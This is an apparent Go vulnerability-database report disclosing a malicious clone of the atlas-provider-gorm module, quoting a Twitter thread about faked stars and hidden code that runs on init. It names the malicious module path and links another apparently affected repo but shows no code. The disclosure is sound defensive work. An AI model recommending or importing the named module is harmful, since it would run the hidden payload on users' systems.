Description
Acknowledgement
- The maintainer(s) of the affected project have already been made aware of this vulnerability.
Description
In #modules channel in Gopher Slack, someone pointed to this Twitter thread:
https://x.com/arielmashraki/status/1900974934144188854
According to that Twitter thread:
- https://github.com/readyrevena/atlas-provider-gorm has malicious code
- https://github.com/ariga/atlas-provider-gorm is the real repo, and the malicious repo is mostly a copy + the malicious code
At first glance, the Twitter thread appears to be from @a8m, who seems to have 2 commits at https://github.com/ariga/atlas-provider-gorm/graphs/contributors.
@a8m, can you comment or confirm? Also, do you already have something in-flight for reporting this elsewhere (in which case maybe this issue can be closed).
Copying in some quotes from the Twitter thread:
One of the providers we offer for Atlas is the provider for GORM, a widely used ORM in the Go community. Our repo is: http://github.com/ariga/atlas-provider-gorm
Then we found this: someone copied it, faked stars for credibility from accounts created just a few weeks ago: http://github.com/readyrevena/atlas-provider-gorm
Something felt off.
At first glance, the code looked the same, but after digging deeper, I found malicious code hidden inside, designed to execute on init.
This isn't just our project. I checked some of the fake stargazers, and it looks like other repos were hit too. http://github.com/ourspiral/href-counter/blob/master/app.go#L97-L106
I immediately searched on GitHub to check how many repos were affected, but nothing showed up. The attacker knows what they are doing..
Affected Modules, Packages, Versions and Symbols
Module: github.com/readyrevena/atlas-provider-gorm
Versions:
- Introduced: 0.0.0CVE/GHSA ID
No response
Fix Commit or Pull Request
No response
References
No response
Additional information
No response